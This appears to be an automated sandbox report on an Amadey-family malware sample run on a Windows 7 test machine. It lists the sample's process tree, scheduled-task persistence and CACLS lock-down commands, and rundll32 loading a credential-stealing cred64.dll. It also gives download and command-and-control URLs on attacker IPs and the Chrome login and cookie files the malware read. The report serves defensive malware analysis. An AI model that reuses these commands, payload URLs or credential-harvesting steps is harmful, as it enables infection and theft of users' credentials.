Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Dec. 8, 2022, 10:31 a.m. | Dec. 8, 2022, 10:52 a.m. |
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
2224 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
2284-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2360 -
cacls.exe CACLS "gntuud.exe" /P "test22:N"
2400 -
cacls.exe CACLS "gntuud.exe" /P "test22:R" /E
2468 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2524 -
cacls.exe CACLS "..\9c69749b54" /P "test22:N"
2560 -
cacls.exe CACLS "..\9c69749b54" /P "test22:R" /E
2616
-
-
-
regsvr32.exe "C:\Windows\System32\regsvr32.exe" YGCR.s /u -S
2768
-
-
nash.exe "C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe"
3028 -
anon.exe "C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe"
2356 -
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
2736 -
-
-
taskkill.exe taskkill /f /im chrome.exe
2564
-
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2ce6e00,0x7fef2ce6e10,0x7fef2ce6e20
2572
-
-
-
-
regsvr32.exe "C:\Windows\System32\regsvr32.exe" YGCR.s /u -S
3052
-
-
wish.exe "C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe"
2108 -
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
2940
-
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll, Main
2608
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
iplogger.org | 148.251.234.83 | |
transfer.sh | 144.76.136.153 | |
www.aculpainting.com | 23.160.193.16 | |
www.icodeps.com | 149.28.253.196 |
IP Address | Status | Action |
---|---|---|
144.76.136.153 | Active | Moloch |
148.251.234.83 | Active | Moloch |
149.28.253.196 | Active | Moloch |
164.124.101.2 | Active | Moloch |
185.106.92.214 | Active | Moloch |
23.160.193.16 | Active | Moloch |
31.41.244.14 | Active | Moloch |
31.41.244.188 | Active | Moloch |
31.41.244.237 | Active | Moloch |
31.41.244.253 | Active | Moloch |
62.204.41.6 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49196 149.28.253.196:443 |
C=CN, O=TrustAsia Technologies, Inc., CN=TrustAsia RSA DV TLS CA G2 | CN=icodeps.com | 87:db:69:7b:62:f3:12:4a:c6:40:1e:05:07:04:95:6d:41:8c:f8:26 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Mktmp\Amadey\Release\Amadey.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\InstallLocation |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://31.41.244.237/jg94cVd30f/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://31.41.244.237/jg94cVd30f/index.php?scr=1 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://31.41.244.253/new/linda5.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://31.41.244.253/goga/nash.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://31.41.244.188/ano/anon.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://62.204.41.6/newlege.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://62.204.41.6/p9cWxH/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://62.204.41.6/p9cWxH/index.php?scr=1 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.aculpainting.com/mp3studios97/mp3studios_97.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.aculpainting.com/mp3studios_97.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://transfer.sh/get/gI6LT0/loader.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://31.41.244.253/miha/wish.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll |
request | POST http://31.41.244.237/jg94cVd30f/index.php |
request | POST http://31.41.244.237/jg94cVd30f/index.php?scr=1 |
request | GET http://31.41.244.253/new/linda5.exe |
request | GET http://31.41.244.253/goga/nash.exe |
request | GET http://31.41.244.188/ano/anon.exe |
request | GET http://62.204.41.6/newlege.exe |
request | POST http://62.204.41.6/p9cWxH/index.php |
request | POST http://62.204.41.6/p9cWxH/index.php?scr=1 |
request | GET http://www.aculpainting.com/mp3studios97/mp3studios_97.exe |
request | GET http://www.aculpainting.com/mp3studios_97.exe |
request | GET http://transfer.sh/get/gI6LT0/loader.exe |
request | GET http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll |
request | GET http://31.41.244.253/miha/wish.exe |
request | GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll |
request | GET https://www.icodeps.com/ |
request | POST http://31.41.244.237/jg94cVd30f/index.php |
request | POST http://31.41.244.237/jg94cVd30f/index.php?scr=1 |
request | POST http://62.204.41.6/p9cWxH/index.php |
request | POST http://62.204.41.6/p9cWxH/index.php?scr=1 |
description | gntuud.exe tried to sleep 331 seconds, actually delayed analysis time by 331 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\f13cd130-bd44-4180-a60f-3cfe14b0b6ef.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6391B3E5-948.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
file | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js |
file | C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe |
file | C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe |
file | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js |
file | C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe |
file | C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe |
file | C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll |
file | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js |
file | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js |
file | C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe |
file | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js |
file | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js |
file | C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F |
cmdline | cmd.exe /c taskkill /f /im chrome.exe |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F |
cmdline | "C:\Windows\System32\regsvr32.exe" YGCR.s /u -S |
cmdline | regsvr32 YGCR.s /u -S |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe |
file | C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe |
file | C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe |
file | C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe |
file | C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe |
file | C:\Users\test22\AppData\Local\Temp\YGCR.s |
file | C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe |
file | C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe |
file | C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |